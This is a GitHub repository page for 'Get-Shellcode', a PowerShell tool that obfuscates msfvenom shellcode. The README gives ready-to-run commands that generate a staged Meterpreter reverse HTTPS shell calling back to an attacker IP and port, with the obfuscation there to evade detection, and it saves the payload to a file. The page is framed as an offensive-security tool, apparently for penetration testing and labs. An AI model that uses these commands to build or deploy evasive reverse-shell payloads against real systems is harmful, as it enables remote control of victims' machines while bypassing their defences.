Skip to content
/ Get-Shellcode Public

A solution to create obfuscated shellcode from msfvenom for PowerShell.

License

GPL-3.0 license
24 stars 2 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

gh0x0st/Get-Shellcode

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

2 Commits
Get-Shellcode.ps1
Get-Shellcode.ps1
 
 
LICENSE
LICENSE
 
 
README.md
README.md
 
 

Repository files navigation

Obfuscated Msfvenom Shellcode for Powershell

Get-Shellcode is a project that stems from the Invoke-PSObfuscation framework, with the sole purpose of producing obfuscated shellcode generated from msfvenom for PowerShell payloads.

Requirements

This script was built and tested on the following version Kali Linux and PowerShell. The resulting payload is compatible on systems that support PowerShell newer than version 2.0. This script also relies on msfvenom being accessible on the system, which is available by default on Kali.

┌──(kali㉿kali)-[/home/kali]
└─PS> $PSVersionTable

Name                           Value
----                           -----
PSVersion                      7.2.4
PSEdition                      Core
GitCommitId                    7.2.4
OS                             Linux 5.18.0-kali5-amd64 #1 SMP PREEMPT_DYNAMIC Debian 5.18.5-1kali6 (2022-07-07)
Platform                       Unix
PSCompatibleVersions           {1.0, 2.0, 3.0, 4.0…}
PSRemotingProtocolVersion      2.3
SerializationVersion           1.1.0.1
WSManStackVersion              3.0

Usage Examples

To load the script on Kali Linux, open a terminal then run pwsh. With PowerShell now running in your terminal, you can load the script into your current session by dot sourcing the script.

┌──(kali㉿kali)-[~]
└─$ pwsh
PowerShell 7.2.4
Copyright (c) Microsoft Corporation.

https://aka.ms/powershell
Type 'help' to get help.

┌──(kali㉿kali)-[/home/kali]
└─PS> . ./Get-Shellcode.ps1

With the script loaded into our PowerShell session, we need to run the Get-Shellcode function to generate our payload. We are able to generate a payload via two different methods, the default payload and a supplied payload.

Default Payload

The default payload that's generated by this script is a staged meterpreter reverse https shellcode, which only requires us to pass an ip and port. This default payload also sets EXITFUNC to thread. This default is merely out of personal preference and can be changed with ease.

Get-Shellcode -Ip 192.168.49.80 -Port 443

Supplied Payload

The second payload is the supplied payload, where we can pass our own parameters into msfvenom. Keep in mind that this solution is designed for PowerShell payloads so you must include -f ps1. Staged payloads are significantly smaller than a stageless payload so stageless payloads will take more time to be processed. If you also happen to pass a custom payload variable name, it will get obfuscated as well.

Get-Shellcode -Msfvenom "-p windows/x64/meterpreter/reverse_https LHOST=192.168.49.80 LPORT=443 EXITFUNC=thread -f ps1"

Output to File

Get-Shellcode -Msfvenom "-p windows/x64/meterpreter/reverse_https LHOST=192.168.49.80 LPORT=443 EXITFUNC=thread -f ps1" -OutFile obfuscated.ps1

About

A solution to create obfuscated shellcode from msfvenom for PowerShell.

Topics

obfuscation powershell cybersecurity shellcode kali-linux msfvenom offensive-security security-tools

Resources

Readme

License

GPL-3.0 license
Activity

Stars

24 stars

Watchers

1 watching

Forks

2 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages